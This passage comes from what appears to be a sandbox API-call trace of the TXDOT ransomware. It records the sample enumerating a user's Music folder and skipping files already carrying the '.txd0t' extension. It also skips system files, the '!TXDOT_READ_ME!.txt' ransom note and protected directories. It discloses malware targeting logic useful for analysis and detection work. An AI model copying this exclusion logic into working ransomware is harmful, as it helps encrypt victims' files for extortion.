psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\" [0129.588] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\!TXDOT_READ_ME!.txt" [0129.588] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0129.588] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0129.588] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0129.588] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0129.588] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0129.588] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0129.588] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0129.588] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0129.588] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0129.588] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0129.588] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0129.588] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0129.588] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0129.588] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0129.588] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0129.588] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0129.588] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d7fdbe0, ftCreationTime.dwHighDateTime=0x1d5e9c7, ftLastAccessTime.dwLowDateTime=0x58ec1a0, ftLastAccessTime.dwHighDateTime=0x1d5eff7, ftLastWriteTime.dwLowDateTime=0x51e69890, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x4ee3, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="UMILH6.mp3.txd0t", cAlternateFileName="UMILH6~1.TXD")) returned 1 [0129.588] StrCmpW (psz1="UMILH6.mp3.txd0t", psz2=".") returned 1 [0129.588] StrCmpW (psz1="UMILH6.mp3.txd0t", psz2="..") returned 1 [0129.588] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ" [0129.588] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", psz2="\\", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\" [0129.588] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\", psz2="UMILH6.mp3.txd0t", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\UMILH6.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\UMILH6.mp3.txd0t" [0129.588] PathFindExtensionW (pszPath="UMILH6.mp3.txd0t") returned=".txd0t" [0129.588] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.588] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2471fa0, ftCreationTime.dwHighDateTime=0x1d5e392, ftLastAccessTime.dwLowDateTime=0xf62b1850, ftLastAccessTime.dwHighDateTime=0x1d5edc4, ftLastWriteTime.dwLowDateTime=0x51e8fa97, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xd0d5, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="v24aCFd5CzBX.mp3.txd0t", cAlternateFileName="V24ACF~1.TXD")) returned 1 [0129.588] StrCmpW (psz1="v24aCFd5CzBX.mp3.txd0t", psz2=".") returned 1 [0129.589] StrCmpW (psz1="v24aCFd5CzBX.mp3.txd0t", psz2="..") returned 1 [0129.589] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ" [0129.589] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ", psz2="\\", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\" [0129.589] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\", psz2="v24aCFd5CzBX.mp3.txd0t", cchMax=1126 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\v24aCFd5CzBX.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\7k19qHZKQ\\v24aCFd5CzBX.mp3.txd0t" [0129.589] PathFindExtensionW (pszPath="v24aCFd5CzBX.mp3.txd0t") returned=".txd0t" [0129.589] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.589] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2471fa0, ftCreationTime.dwHighDateTime=0x1d5e392, ftLastAccessTime.dwLowDateTime=0xf62b1850, ftLastAccessTime.dwHighDateTime=0x1d5edc4, ftLastWriteTime.dwLowDateTime=0x51e8fa97, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xd0d5, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="v24aCFd5CzBX.mp3.txd0t", cAlternateFileName="V24ACF~1.TXD")) returned 0 [0129.589] FindClose (in: hFindFile=0xec1c70 | out: hFindFile=0xec1c70) returned 1 [0129.589] GetProcessHeap () returned 0xe30000 [0129.589] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0129.589] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbe99d0, ftCreationTime.dwHighDateTime=0x1d5eb78, ftLastAccessTime.dwLowDateTime=0x15050de0, ftLastAccessTime.dwHighDateTime=0x1d5e45a, ftLastWriteTime.dwLowDateTime=0x51fc0eec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x181c7, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="cSnUOnQz6xEd.wav.txd0t", cAlternateFileName="CSNUON~1.TXD")) returned 1 [0129.589] StrCmpW (psz1="cSnUOnQz6xEd.wav.txd0t", psz2=".") returned 1 [0129.589] StrCmpW (psz1="cSnUOnQz6xEd.wav.txd0t", psz2="..") returned 1 [0129.589] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0129.589] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\" [0129.589] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\", psz2="cSnUOnQz6xEd.wav.txd0t", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\cSnUOnQz6xEd.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\cSnUOnQz6xEd.wav.txd0t" [0129.589] PathFindExtensionW (pszPath="cSnUOnQz6xEd.wav.txd0t") returned=".txd0t" [0129.589] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.589] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b60a1a0, ftCreationTime.dwHighDateTime=0x1d5e472, ftLastAccessTime.dwLowDateTime=0x387b3280, ftLastAccessTime.dwHighDateTime=0x1d5eca3, ftLastWriteTime.dwLowDateTime=0x51edbf2e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x18b82, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="Ftx5O-lqQUv4Qc8fXk.mp3.txd0t", cAlternateFileName="FTX5O-~1.TXD")) returned 1 [0129.589] StrCmpW (psz1="Ftx5O-lqQUv4Qc8fXk.mp3.txd0t", psz2=".") returned 1 [0129.589] StrCmpW (psz1="Ftx5O-lqQUv4Qc8fXk.mp3.txd0t", psz2="..") returned 1 [0129.589] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0129.589] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\" [0129.589] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\", psz2="Ftx5O-lqQUv4Qc8fXk.mp3.txd0t", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\Ftx5O-lqQUv4Qc8fXk.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\Ftx5O-lqQUv4Qc8fXk.mp3.txd0t" [0129.589] PathFindExtensionW (pszPath="Ftx5O-lqQUv4Qc8fXk.mp3.txd0t") returned=".txd0t" [0129.589] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.589] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafa72b10, ftCreationTime.dwHighDateTime=0x1d5eb5a, ftLastAccessTime.dwLowDateTime=0x495be580, ftLastAccessTime.dwHighDateTime=0x1d5ee3e, ftLastWriteTime.dwLowDateTime=0x51fe6f8f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x122cd, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="JKFgwNnPDq3IzeypAX.wav.txd0t", cAlternateFileName="JKFGWN~1.TXD")) returned 1 [0129.589] StrCmpW (psz1="JKFgwNnPDq3IzeypAX.wav.txd0t", psz2=".") returned 1 [0129.589] StrCmpW (psz1="JKFgwNnPDq3IzeypAX.wav.txd0t", psz2="..") returned 1 [0129.589] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0129.589] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\" [0129.589] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\", psz2="JKFgwNnPDq3IzeypAX.wav.txd0t", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\JKFgwNnPDq3IzeypAX.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\JKFgwNnPDq3IzeypAX.wav.txd0t" [0129.589] PathFindExtensionW (pszPath="JKFgwNnPDq3IzeypAX.wav.txd0t") returned=".txd0t" [0129.590] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.590] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe1171f0, ftCreationTime.dwHighDateTime=0x1d5edb4, ftLastAccessTime.dwLowDateTime=0xd60c0a10, ftLastAccessTime.dwHighDateTime=0x1d5f054, ftLastWriteTime.dwLowDateTime=0x52118433, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x101f9, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="NXIDve2FMxUql9.wav.txd0t", cAlternateFileName="NXIDVE~1.TXD")) returned 1 [0129.590] StrCmpW (psz1="NXIDve2FMxUql9.wav.txd0t", psz2=".") returned 1 [0129.590] StrCmpW (psz1="NXIDve2FMxUql9.wav.txd0t", psz2="..") returned 1 [0129.590] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0129.590] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\" [0129.590] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\", psz2="NXIDve2FMxUql9.wav.txd0t", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\NXIDve2FMxUql9.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\NXIDve2FMxUql9.wav.txd0t" [0129.590] PathFindExtensionW (pszPath="NXIDve2FMxUql9.wav.txd0t") returned=".txd0t" [0129.590] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.590] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdece000, ftCreationTime.dwHighDateTime=0x1d5ee36, ftLastAccessTime.dwLowDateTime=0x5255457f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5255457f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="toS-EwE0vCCwoskwD1", cAlternateFileName="TOS-EW~1")) returned 1 [0129.590] StrCmpW (psz1="toS-EwE0vCCwoskwD1", psz2=".") returned 1 [0129.590] StrCmpW (psz1="toS-EwE0vCCwoskwD1", psz2="..") returned 1 [0129.590] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU" [0129.590] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\" [0129.590] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\", psz2="toS-EwE0vCCwoskwD1", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1" [0129.590] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\windows\\system32\\") returned 0x0 [0129.590] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.590] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\windows\\system\\") returned 0x0 [0129.590] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.590] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.590] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\appdata\\local\\") returned 0x0 [0129.590] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.590] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.590] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.590] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch=":\\boot\\") returned 0x0 [0129.590] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch=":\\perflogs\\") returned 0x0 [0129.590] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch=":\\programdata\\") returned 0x0 [0129.590] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch=":\\drivers\\") returned 0x0 [0129.590] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch=":\\wsus\\") returned 0x0 [0129.590] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.590] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.590] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="crypt_detect") returned 0x0 [0129.591] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="cryptolocker") returned 0x0 [0129.591] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="ransomware") returned 0x0 [0129.591] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="C:\\WINDOWS") returned 0x0 [0129.591] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.591] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="C:\\Program Files") returned 0x0 [0129.591] GetProcessHeap () returned 0xe30000 [0129.591] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4f8) returned 0xef3600 [0129.591] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1" [0129.591] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", psz2="\\*", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\*") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\*" [0129.591] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\*", lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdece000, ftCreationTime.dwHighDateTime=0x1d5ee36, ftLastAccessTime.dwLowDateTime=0x5255457f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5255457f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x770ea4, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1ab0 [0129.591] StrCmpW (psz1=".", psz2=".") returned 0 [0129.591] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdece000, ftCreationTime.dwHighDateTime=0x1d5ee36, ftLastAccessTime.dwLowDateTime=0x5255457f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5255457f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x770ea4, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.591] StrCmpW (psz1="..", psz2=".") returned 1 [0129.591] StrCmpW (psz1="..", psz2="..") returned 0 [0129.591] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x524613ac, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x524613ac, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x52500e1d, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x770ea4, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0129.591] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0129.591] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0129.591] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1" [0129.591] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", psz2="\\", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\" [0129.591] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\!TXDOT_READ_ME!.txt" [0129.591] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0129.591] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0129.591] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0129.591] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0129.591] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0129.591] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0129.591] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0129.591] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0129.591] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0129.591] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0129.591] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0129.592] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0129.592] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0129.592] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0129.592] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0129.592] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0129.592] FindNextFileW (in: hFindFile=0xec1ab0, lpFindFileData=0x599ee38 | out: lpFindFileData=0x599ee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9405f720, ftCreationTime.dwHighDateTime=0x1d5ed16, ftLastAccessTime.dwLowDateTime=0xa95acb70, ftLastAccessTime.dwHighDateTime=0x1d5e882, ftLastWriteTime.dwLowDateTime=0x5213e9a4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13877, dwReserved0=0x770ea4, 